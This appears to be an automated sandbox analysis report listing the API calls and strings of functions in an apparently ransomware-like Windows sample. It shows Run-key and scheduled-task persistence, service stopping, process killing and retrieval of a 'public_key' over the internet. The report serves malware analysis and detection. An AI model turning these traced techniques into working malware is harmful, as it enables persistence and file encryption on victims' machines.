            • Instruction ID: 8b5b6749b4f509f283f4592c8036b9fc340ac08d61b50d13b2524a40b9fdfb6a
            • Opcode Fuzzy Hash: 6bd5cc8f3dd8ebf785cdc17837931ce977b5cf0fd4524e89a9393df48daa8713
            • Instruction Fuzzy Hash: 7E21B331705A21ABE7217F66B802E1F7FE4DF41728BD0442FF44459192EA39A800CA5D
            APIs
            • PostQuitMessage.USER32(00000000), ref: 0041BB49
            • DefWindowProcW.USER32(?,?,?,?), ref: 0041BBBA
            • _malloc.LIBCMT ref: 0041BBE4
            • GetComputerNameW.KERNEL32(00000000,?), ref: 0041BBF4
            • _free.LIBCMT ref: 0041BCD7
              • Part of subcall function 00411CD0: RegOpenKeyExW.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?,?,?,?,?,?,004CAC68,000000FF), ref: 00411D12
              • Part of subcall function 00411CD0: _memset.LIBCMT ref: 00411D3B
              • Part of subcall function 00411CD0: RegQueryValueExW.KERNEL32(?,SysHelper,00000000,?,?,00000400), ref: 00411D63
              • Part of subcall function 00411CD0: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004CAC68,000000FF), ref: 00411D6C
              • Part of subcall function 00411CD0: lstrlenA.KERNEL32(" --AutoStart,?,?), ref: 00411DD6
              • Part of subcall function 00411CD0: PathFileExistsW.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,-00000001), ref: 00411E48
            • IsWindow.USER32(?), ref: 0041BF69
            • DestroyWindow.USER32(?), ref: 0041BF7B
            • DefWindowProcW.USER32(?,00008003,?,?), ref: 0041BFA8
            Memory Dump Source
            • Source File: 00000002.00000002.2189872384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000002.00000002.2189872384.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
            • Associated: 00000002.00000002.2189872384.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_400000_file.jbxd
            Yara matches
            Similarity
            • API ID: Window$Proc$CloseComputerDestroyExistsFileMessageNameOpenPathPostQueryQuitValue_free_malloc_memsetlstrlen
            • String ID:
            • API String ID: 3873257347-0
            • Opcode ID: d87ae02ebb827c572a96defd0b94b563a2a13f3acd0a84997267fb9c98df2b66
            • Instruction ID: 866eb7db68ae170cd8e17be643faf7720e0ae735171854e0fa5cbc2bc792534d
            • Opcode Fuzzy Hash: d87ae02ebb827c572a96defd0b94b563a2a13f3acd0a84997267fb9c98df2b66
            • Instruction Fuzzy Hash: 85C19171508340AFDB20DF25DD45B9BBBE0FF85318F14492EF888863A1D7799885CB9A
            APIs
            • CoInitialize.OLE32(00000000), ref: 00411BB0
            • CoCreateInstance.OLE32(004CE908,00000000,00000001,004CD568,00000000), ref: 00411BC8
            • CoUninitialize.OLE32 ref: 00411BD0
            • SHGetSpecialFolderLocation.SHELL32(00000000,00000007,?), ref: 00411C12
            • SHGetPathFromIDListW.SHELL32(?,?), ref: 00411C22
            • lstrcatW.KERNEL32(?,00500050), ref: 00411C3A
            • lstrcatW.KERNEL32(?), ref: 00411C44
            • GetSystemDirectoryW.KERNEL32(?,00000100), ref: 00411C68
            • lstrcatW.KERNEL32(?,\shell32.dll), ref: 00411C7A
            Strings
            Memory Dump Source
            • Source File: 00000002.00000002.2189872384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000002.00000002.2189872384.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
            • Associated: 00000002.00000002.2189872384.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_400000_file.jbxd
            Yara matches
            Similarity
            • API ID: lstrcat$CreateDirectoryFolderFromInitializeInstanceListLocationPathSpecialSystemUninitialize
            • String ID: \shell32.dll
            • API String ID: 679253221-3783449302
            • Opcode ID: 45e46fc2f9e137a48023c8b07f4e0b5fd5f09384ac33b8a62bbc2b8c253a451b
            • Instruction ID: 1ac700bd2dba931ae0f93f3cd35093afe8c3aec66b03df765643047a9f16b657
            • Opcode Fuzzy Hash: 45e46fc2f9e137a48023c8b07f4e0b5fd5f09384ac33b8a62bbc2b8c253a451b
            • Instruction Fuzzy Hash: 1D415E70A40209AFDB10CBA4DC88FEA7B7CEF44705F104499F609D7160D6B4AA45CB54
            APIs
            • GetModuleHandleA.KERNEL32(?,?,00000001,?,00454B72), ref: 004549C7
            • GetProcAddress.KERNEL32(00000000,_OPENSSL_isservice), ref: 004549D7
            • GetDesktopWindow.USER32 ref: 004549FB
            • GetProcessWindowStation.USER32(?,00454B72), ref: 00454A01
            • GetUserObjectInformationW.USER32(00000000,00000002,00000000,00000000,?,?,00454B72), ref: 00454A1C
            • GetLastError.KERNEL32(?,00454B72), ref: 00454A2A
            • GetUserObjectInformationW.USER32(00000000,00000002,?,?,?,?,00454B72), ref: 00454A65
            • _wcsstr.LIBCMT ref: 00454A8A
            Strings
            Memory Dump Source
            • Source File: 00000002.00000002.2189872384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000002.00000002.2189872384.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
            • Associated: 00000002.00000002.2189872384.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_400000_file.jbxd
            Yara matches
            Similarity
            • API ID: InformationObjectUserWindow$AddressDesktopErrorHandleLastModuleProcProcessStation_wcsstr
            • String ID: Service-0x$_OPENSSL_isservice
            • API String ID: 2112994598-1672312481
            • Opcode ID: 839ece2f53d05b3d3a3b41915715d02d267126b8b76695ecb3f97597e52a1477
            • Instruction ID: a4b3c478c226dd270820e71b951499fe23bca8177d071b610c32d3665965eb2a
            • Opcode Fuzzy Hash: 839ece2f53d05b3d3a3b41915715d02d267126b8b76695ecb3f97597e52a1477
            • Instruction Fuzzy Hash: 04312831A401049BCB10DBBAEC46AAE7778DFC4325F10426BFC19D72E1EB349D148B58
            APIs
            • GetStdHandle.KERNEL32(000000F4,00454C16,%s(%d): OpenSSL internal error, assertion failed: %s,?,?,?,0045480E,.\crypto\cryptlib.c,00000253,pointer != NULL,?,00451D37,00000000,0040CDAE,00000001,00000001), ref: 00454AFA
            • GetFileType.KERNEL32(00000000,?,00451D37,00000000,0040CDAE,00000001,00000001), ref: 00454B05
            • __vfwprintf_p.LIBCMT ref: 00454B27
              • Part of subcall function 0042BDCC: _vfprintf_helper.LIBCMT ref: 0042BDDF
            • vswprintf.LIBCMT ref: 00454B5D
            • RegisterEventSourceA.ADVAPI32(00000000,OPENSSL), ref: 00454B7E
            • ReportEventA.ADVAPI32(00000000,00000001,00000000,00000000,00000000,00000001,00000000,?,00000000), ref: 00454BA2
            • DeregisterEventSource.ADVAPI32(00000000), ref: 00454BA9
            • MessageBoxA.USER32(00000000,?,OpenSSL: FATAL,00000010), ref: 00454BD3
            Strings
            Memory Dump Source
            • Source File: 00000002.00000002.2189872384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000002.00000002.2189872384.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
            • Associated: 00000002.00000002.2189872384.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_400000_file.jbxd
            Yara matches
            Similarity
            • API ID: Event$Source$DeregisterFileHandleMessageRegisterReportType__vfwprintf_p_vfprintf_helpervswprintf
            • String ID: OPENSSL$OpenSSL: FATAL
            • API String ID: 277090408-1348657634
            • Opcode ID: 48266b123bee2effe3eea144965b75bbd91e26d62acab2e3a1446f4d096604c6
            • Instruction ID: 2d266f03b07cc91b1361f4b715b0612335af4cc100d4b249efeb6d9ab3704f8b
            • Opcode Fuzzy Hash: 48266b123bee2effe3eea144965b75bbd91e26d62acab2e3a1446f4d096604c6
            • Instruction Fuzzy Hash: 74210D716443006BD770A761DC47FEF77D8EF94704F80482EF699861D1EAB89444875B
            APIs
            • RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?), ref: 00412389
            • _memset.LIBCMT ref: 004123B6
            • RegQueryValueExW.ADVAPI32(?,SysHelper,00000000,00000001,?,00000400), ref: 004123DE
            • RegCloseKey.ADVAPI32(?), ref: 004123E7
            • GetCommandLineW.KERNEL32 ref: 004123F4
            • CommandLineToArgvW.SHELL32(00000000,00000000), ref: 004123FF
            • lstrcpyW.KERNEL32(?,00000000), ref: 0041240E
            • lstrcmpW.KERNEL32(?,?), ref: 00412422
            Strings
            • SysHelper, xrefs: 004123D6
            • Software\Microsoft\Windows\CurrentVersion\Run, xrefs: 0041237F
            Memory Dump Source
            • Source File: 00000002.00000002.2189872384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000002.00000002.2189872384.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
            • Associated: 00000002.00000002.2189872384.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_400000_file.jbxd
            Yara matches
            Similarity
            • API ID: CommandLine$ArgvCloseOpenQueryValue_memsetlstrcmplstrcpy
            • String ID: Software\Microsoft\Windows\CurrentVersion\Run$SysHelper
            • API String ID: 122392481-4165002228
            • Opcode ID: ffdeb467f25692adb2f41c7a5be08654f874d2c95d3133ace75c87d70b3a0200
            • Instruction ID: c603cf62551caa9c06587f3e6ced3ee16b2371f56cdaae2afb18e0be874d4686
            • Opcode Fuzzy Hash: ffdeb467f25692adb2f41c7a5be08654f874d2c95d3133ace75c87d70b3a0200
            • Instruction Fuzzy Hash: D7112C7194020DABDF50DFA0DC89FEE77BCBB04705F0445A5F509E2151DBB45A889F94
            APIs
            Strings
            Memory Dump Source
            • Source File: 00000002.00000002.2189872384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000002.00000002.2189872384.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
            • Associated: 00000002.00000002.2189872384.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_400000_file.jbxd
            Yara matches
            Similarity
            • API ID: _memmove
            • String ID: invalid string position$string too long
            • API String ID: 4104443479-4289949731
            • Opcode ID: 72cc4f69e8dc9d7bd856fc9c1b9749c6ccd7664eafd668a19730564a7e917932
            • Instruction ID: bf4c3c4c16418921af35957e8a842e40232b78bc4dd53ff6fdc572851f10e90f
            • Opcode Fuzzy Hash: 72cc4f69e8dc9d7bd856fc9c1b9749c6ccd7664eafd668a19730564a7e917932
            • Instruction Fuzzy Hash: 4AC19F71700209EFDB18CF48C9819EE77A6EF85704B24492EE891CB741DB34ED968B99
            APIs
            • CoInitialize.OLE32(00000000), ref: 0040DAEB
            • CoCreateInstance.OLE32(004D4F6C,00000000,00000001,004D4F3C,?,?,004CA948,000000FF), ref: 0040DB0B
            • lstrcpyW.KERNEL32(?,?), ref: 0040DBD6
            • PathRemoveFileSpecW.SHLWAPI(?,?,?,?,?,?,004CA948,000000FF), ref: 0040DBE3
            • _memset.LIBCMT ref: 0040DC38
            • CoUninitialize.OLE32 ref: 0040DC92
            Strings
            Memory Dump Source
            • Source File: 00000002.00000002.2189872384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000002.00000002.2189872384.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
            • Associated: 00000002.00000002.2189872384.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_400000_file.jbxd
            Yara matches
            Similarity
            • API ID: CreateFileInitializeInstancePathRemoveSpecUninitialize_memsetlstrcpy
            • String ID: --Task$Comment$Time Trigger Task
            • API String ID: 330603062-1376107329
            • Opcode ID: 4f76096c1bb55b8fd6772bfaf79823c9e02c83c8f45e810a8838bdd484e9cb7f
            • Instruction ID: 3ca8ca325a9fd4b6db29fab4a8cd6851ae340f1496bb62272076f21ffc706129
            • Opcode Fuzzy Hash: 4f76096c1bb55b8fd6772bfaf79823c9e02c83c8f45e810a8838bdd484e9cb7f
            • Instruction Fuzzy Hash: E051F670A40209AFDB00DF94CC99FAE7BB9FF88705F208469F505AB2A0DB75A945CF54
            APIs
            • OpenSCManagerW.ADVAPI32(00000000,00000000,00000001), ref: 00411A1D
            • OpenServiceW.ADVAPI32(00000000,MYSQL,00000020), ref: 00411A32
            • ControlService.ADVAPI32(00000000,00000001,?), ref: 00411A46
            • QueryServiceStatus.ADVAPI32(00000000,?), ref: 00411A5B
            • Sleep.KERNEL32(?), ref: 00411A75
            • QueryServiceStatus.ADVAPI32(00000000,?), ref: 00411A80
            • CloseServiceHandle.ADVAPI32(00000000), ref: 00411A9E
            • CloseServiceHandle.ADVAPI32(00000000), ref: 00411AA1
            Strings
            Memory Dump Source
            • Source File: 00000002.00000002.2189872384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000002.00000002.2189872384.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
            • Associated: 00000002.00000002.2189872384.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_400000_file.jbxd
            Yara matches
            Similarity
            • API ID: Service$CloseHandleOpenQueryStatus$ControlManagerSleep
            • String ID: MYSQL
            • API String ID: 2359367111-1651825290
            • Opcode ID: 692faa110e64916c7c56b6385ee5ad1bce035bf71229861a57ca5c091c1d7d7f
            • Instruction ID: 28721974f2ef8f77e49d09c1c1511d7c7b7ffc9f5d452c27f8aea73f5df61dea
            • Opcode Fuzzy Hash: 692faa110e64916c7c56b6385ee5ad1bce035bf71229861a57ca5c091c1d7d7f
            • Instruction Fuzzy Hash: 7F117735A01209ABDB209BD59D88FEF7FACEF45791F040122FB08D2250D728D985CAA8
            APIs
            • std::exception::exception.LIBCMT ref: 0044F27F
              • Part of subcall function 00430CFC: std::exception::_Copy_str.LIBCMT ref: 00430D15
            • __CxxThrowException@8.LIBCMT ref: 0044F294
              • Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,?,<yP,?,?,?,?,?,00423B9C,?,0050793C,?,00000001), ref: 00430F1F
            • std::exception::exception.LIBCMT ref: 0044F2AD
            • __CxxThrowException@8.LIBCMT ref: 0044F2C2
            • std::regex_error::regex_error.LIBCPMT ref: 0044F2D4
              • Part of subcall function 0044EF74: std::exception::exception.LIBCMT ref: 0044EF8E
            • __CxxThrowException@8.LIBCMT ref: 0044F2E2
            • std::exception::exception.LIBCMT ref: 0044F2FB
            • __CxxThrowException@8.LIBCMT ref: 0044F310
            Strings
            Memory Dump Source
            • Source File: 00000002.00000002.2189872384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000002.00000002.2189872384.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
            • Associated: 00000002.00000002.2189872384.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_400000_file.jbxd
            Yara matches
            Similarity
            • API ID: Exception@8Throwstd::exception::exception$Copy_strExceptionRaisestd::exception::_std::regex_error::regex_error
            • String ID: bad function call
            • API String ID: 2464034642-3612616537
            • Opcode ID: ed214ebb3701571be2f43069d920533da395f334550e3d3fd8b3428f3c6f404b
            • Instruction ID: b7a33952e270e61bb8336860f47bfa26d0287e47148adb1a9e07c7a629f44a3a
            • Opcode Fuzzy Hash: ed214ebb3701571be2f43069d920533da395f334550e3d3fd8b3428f3c6f404b
            • Instruction Fuzzy Hash: 60110A74D0020DBBCB04FFA5D566CDDBB7CEA04348F408A67BD2497241EB78A7498B99
            APIs
            • MultiByteToWideChar.KERNEL32(0000FDE9,00000008,?,?,00000000,?,?,00000000), ref: 004654C8
            • GetLastError.KERNEL32(?,?,00000000), ref: 004654D4
            • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000,?,?,00000000), ref: 004654F7
            • GetLastError.KERNEL32(?,?,00000000), ref: 00465503
            • MultiByteToWideChar.KERNEL32(0000FDE9,00000008,?,?,?,00000000,?,?,00000000), ref: 00465531
            • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,?,00000008,?,00000000,?,?,00000000), ref: 0046555B
            • GetLastError.KERNEL32(.\crypto\bio\bss_file.c,000000A9,?,00000000,?,?,00000000), ref: 004655F5
            Strings
            Memory Dump Source
            • Source File: 00000002.00000002.2189872384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000002.00000002.2189872384.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
            • Associated: 00000002.00000002.2189872384.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_400000_file.jbxd
            Yara matches
            Similarity
            • API ID: ByteCharMultiWide$ErrorLast
            • String ID: ','$.\crypto\bio\bss_file.c$fopen('
            • API String ID: 1717984340-2085858615
            • Opcode ID: 5bed85aa8c1b563afb7458887addcfa84ee938cd819de717f6d53dc9ad9ea7b7
            • Instruction ID: 21cfcf061b86b0f752f7d9b12bec731e5652c25b667fcf3b1ac9b742683446ef
            • Opcode Fuzzy Hash: 5bed85aa8c1b563afb7458887addcfa84ee938cd819de717f6d53dc9ad9ea7b7
            • Instruction Fuzzy Hash: 5A518E71B40704BBEB206B61DC47FBF7769AF05715F40012BFD05BA2C1E669490186AB
            APIs
            Memory Dump Source
            • Source File: 00000002.00000002.2189872384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000002.00000002.2189872384.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
            • Associated: 00000002.00000002.2189872384.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_400000_file.jbxd
            Yara matches
            Similarity
            • API ID: Ex_nolock__lock__updatetlocinfo$___removelocaleref__calloc_crt__copytlocinfo_nolock__wsetlocale_nolock
            • String ID:
            • API String ID: 790675137-0
            • Opcode ID: 7aa5c98289f18997e9299cf2a82b2e33c44f00e8491ec962a9d4b764f8744340
            • Instruction ID: 0fe30f67420a0b57e0336c9221d2143c2ac41a82f10de3dc78134a272e9def7d
            • Opcode Fuzzy Hash: 7aa5c98289f18997e9299cf2a82b2e33c44f00e8491ec962a9d4b764f8744340
            • Instruction Fuzzy Hash: BE412932700724AFDB11AFA6B886B9E7BE0EF44318F90802FF51496282DB7D9544DB1D
            APIs
              • Part of subcall function 00420FDD: __wfsopen.LIBCMT ref: 00420FE8
            • _fgetws.LIBCMT ref: 0040C7BC
            • _memmove.LIBCMT ref: 0040C89F
            • CreateDirectoryW.KERNEL32(C:\SystemID,00000000), ref: 0040C94B
            Strings
            Memory Dump Source
            • Source File: 00000002.00000002.2189872384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000002.00000002.2189872384.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
            • Associated: 00000002.00000002.2189872384.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_400000_file.jbxd
            Yara matches
            Similarity
            • API ID: CreateDirectory__wfsopen_fgetws_memmove
            • String ID: C:\SystemID$C:\SystemID\PersonalID.txt
            • API String ID: 2864494435-54166481
            • Opcode ID: fb686944b339c976eacea12c72b2cba8865104c98ae0a1a06473ea49a68c22d9
            • Instruction ID: 3a80d152ee3a33a632d987be3a831cd6f981e29f6d1810208bb328cacc5ceb60
            • Opcode Fuzzy Hash: fb686944b339c976eacea12c72b2cba8865104c98ae0a1a06473ea49a68c22d9
            • Instruction Fuzzy Hash: 449193B2E00219DBCF20DFA5D9857AFB7B5AF04304F54463BE805B3281E7799A44CB99
            APIs
            • CreateToolhelp32Snapshot.KERNEL32(0000000F,00000000), ref: 0041244F
            • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00412469
            • OpenProcess.KERNEL32(00000001,00000000,?), ref: 004124A1
            • TerminateProcess.KERNEL32(00000000,00000009), ref: 004124B0
            • CloseHandle.KERNEL32(00000000), ref: 004124B7
            • Process32NextW.KERNEL32(00000000,0000022C), ref: 004124C1
            • CloseHandle.KERNEL32(00000000), ref: 004124CD
            Strings
            Memory Dump Source
            • Source File: 00000002.00000002.2189872384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000002.00000002.2189872384.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
            • Associated: 00000002.00000002.2189872384.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_400000_file.jbxd
            Yara matches
            Similarity
            • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
            • String ID: cmd.exe
            • API String ID: 2696918072-723907552
            • Opcode ID: 577ed8ed9705958fd2e422ac99cb6a94193351d2856dfe9262a659f2a85694a3
            • Instruction ID: b239e8364e8e77cb7af63d5752a1eab109cf3eb7ce5fcb3b526656d556a9da04
            • Opcode Fuzzy Hash: 577ed8ed9705958fd2e422ac99cb6a94193351d2856dfe9262a659f2a85694a3
            • Instruction Fuzzy Hash: ED0192355012157BE7206BA1AC89FAF766CEB08714F0400A2FD08D2141EA6489408EB9
            APIs
            • LoadLibraryW.KERNEL32(Shell32.dll), ref: 0040F338
            • GetProcAddress.KERNEL32(00000000,SHGetFolderPathW), ref: 0040F353
            Strings
            Memory Dump Source
            • Source File: 00000002.00000002.2189872384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000002.00000002.2189872384.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
            • Associated: 00000002.00000002.2189872384.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_400000_file.jbxd
            Yara matches
            Similarity
            • API ID: AddressLibraryLoadProc
            • String ID: SHGetFolderPathW$Shell32.dll$\
            • API String ID: 2574300362-2555811374
            • Opcode ID: be864d8308790b92be5507a70b6add5af3086b64f5ec129cc261dae8a5d69eb3
            • Instruction ID: 879cb2c41796572bb27552663435674e3d239ec9c812fe4031d18dca963833e9
            • Opcode Fuzzy Hash: be864d8308790b92be5507a70b6add5af3086b64f5ec129cc261dae8a5d69eb3
            • Instruction Fuzzy Hash: DFC15A70D00209EBDF10DFA4DD85BDEBBB5AF14308F10443AE405B7291EB79AA59CB99
            APIs
            Strings
            Memory Dump Source
            • Source File: 00000002.00000002.2189872384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000002.00000002.2189872384.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
            • Associated: 00000002.00000002.2189872384.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_400000_file.jbxd
            Yara matches
            Similarity
            • API ID: _malloc$__except_handler4_fprintf
            • String ID: &#160;$Error encrypting message: %s$\\n
            • API String ID: 1783060780-3771355929
            • Opcode ID: 03c951cbcffbb22e4b904cab30c58fb638dd7e4556e50294ac70ee7de3450d71
            • Instruction ID: bc568b6946d652cfd5b4c77746d66a5f57144f99ddafb1662d710ebef24806c3
            • Opcode Fuzzy Hash: 03c951cbcffbb22e4b904cab30c58fb638dd7e4556e50294ac70ee7de3450d71
            • Instruction Fuzzy Hash: 10A196B1C00249EBEF10EF95DD46BDEBB75AF10308F54052DE40576282D7BA5688CBAA
            APIs
            Strings
            Memory Dump Source
            • Source File: 00000002.00000002.2189872384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000002.00000002.2189872384.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
            • Associated: 00000002.00000002.2189872384.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_400000_file.jbxd
            Yara matches
            Similarity
            • API ID: _strncmp
            • String ID: .\crypto\pem\pem_lib.c$DEK-Info: $ENCRYPTED$Proc-Type:
            • API String ID: 909875538-2908105608
            • Opcode ID: ab3012ab59146815ebf28714d7aa14745dda8ec0f3d5ba1861611fdbbd5b6dc0
            • Instruction ID: 5da15f4c8f0622be9955200bbf206a62195e74188b9aea783317ae4bc8ba6fc6
            • Opcode Fuzzy Hash: ab3012ab59146815ebf28714d7aa14745dda8ec0f3d5ba1861611fdbbd5b6dc0
            • Instruction Fuzzy Hash: B7413EA1BC83C129F721592ABC03F9763854B51B17F080467FA88E52C3FB9D8987419F
            APIs
            • RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion,00000000,000F003F,?), ref: 0040C6C2
            • RegQueryValueExW.ADVAPI32(00000000,SysHelper,00000000,00000004,?,?), ref: 0040C6F3
            • RegCloseKey.ADVAPI32(00000000), ref: 0040C700
            • RegSetValueExW.ADVAPI32(00000000,SysHelper,00000000,00000004,?,00000004), ref: 0040C725
            • RegCloseKey.ADVAPI32(00000000), ref: 0040C72E
            Strings
            Memory Dump Source
            • Source File: 00000002.00000002.2189872384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000002.00000002.2189872384.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
            • Associated: 00000002.00000002.2189872384.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_400000_file.jbxd
            Yara matches
            Similarity
            • API ID: CloseValue$OpenQuery
            • String ID: Software\Microsoft\Windows\CurrentVersion$SysHelper
            • API String ID: 3962714758-1667468722
            • Opcode ID: 1b3e89e7960631348278952d172054be4d8a3531237e516afd507403cd6f8071
            • Instruction ID: 83d53c3b81c5c3826f22504a9cab54a14a7287ca0244f3776693af22b4817dfa
            • Opcode Fuzzy Hash: 1b3e89e7960631348278952d172054be4d8a3531237e516afd507403cd6f8071
            • Instruction Fuzzy Hash: 60112D7594020CFBDB109F91CC86FEEBB78EB04708F2041A5FA04B22A1D7B55B14AB58
            APIs
            • _memset.LIBCMT ref: 0041E707
              • Part of subcall function 0040C500: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0040C51B
            • InternetOpenW.WININET ref: 0041E743
            • _wcsstr.LIBCMT ref: 0041E7AE
            • _memmove.LIBCMT ref: 0041E838
            • lstrcpyW.KERNEL32(?,?), ref: 0041E90A
            • lstrcatW.KERNEL32(?,&first=false), ref: 0041E93D
            • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0041E954
            • InternetReadFile.WININET(00000000,?,00000400,?), ref: 0041E96F
            • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0041E98C
            • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0041E9A3
            • lstrlenA.KERNEL32(?,00000000,00000000,000000FF), ref: 0041E9CD
            • InternetCloseHandle.WININET(00000000), ref: 0041E9F3
            • InternetCloseHandle.WININET(00000000), ref: 0041E9F6
            • _strstr.LIBCMT ref: 0041EA36
            • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0041EA59
            • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0041EA74
            • DeleteFileA.KERNEL32(?), ref: 0041EA82
            • lstrlenA.KERNEL32({"public_key":",00000000,000000FF), ref: 0041EA92
            • lstrcpyA.KERNEL32(?,?), ref: 0041EAA4
            • lstrcpyA.KERNEL32(?,?), ref: 0041EABA
            • lstrlenA.KERNEL32(?), ref: 0041EAC8
            • lstrlenA.KERNEL32(00000022), ref: 0041EAE3
            • lstrcpyW.KERNEL32(?,00000000), ref: 0041EB5B
            • lstrlenA.KERNEL32(?), ref: 0041EB7C
            • _malloc.LIBCMT ref: 0041EB86
            • _memset.LIBCMT ref: 0041EB94
            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000001), ref: 0041EBAE
            • lstrcpyW.KERNEL32(?,00000000), ref: 0041EBB6
            • _strstr.LIBCMT ref: 0041EBDA
            • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0041EC00
            • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0041EC24
            • DeleteFileA.KERNEL32(?), ref: 0041EC32
            Strings
            Memory Dump Source
            • Source File: 00000002.00000002.2189872384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000002.00000002.2189872384.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
            • Associated: 00000002.00000002.2189872384.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_400000_file.jbxd
            Yara matches
            Similarity
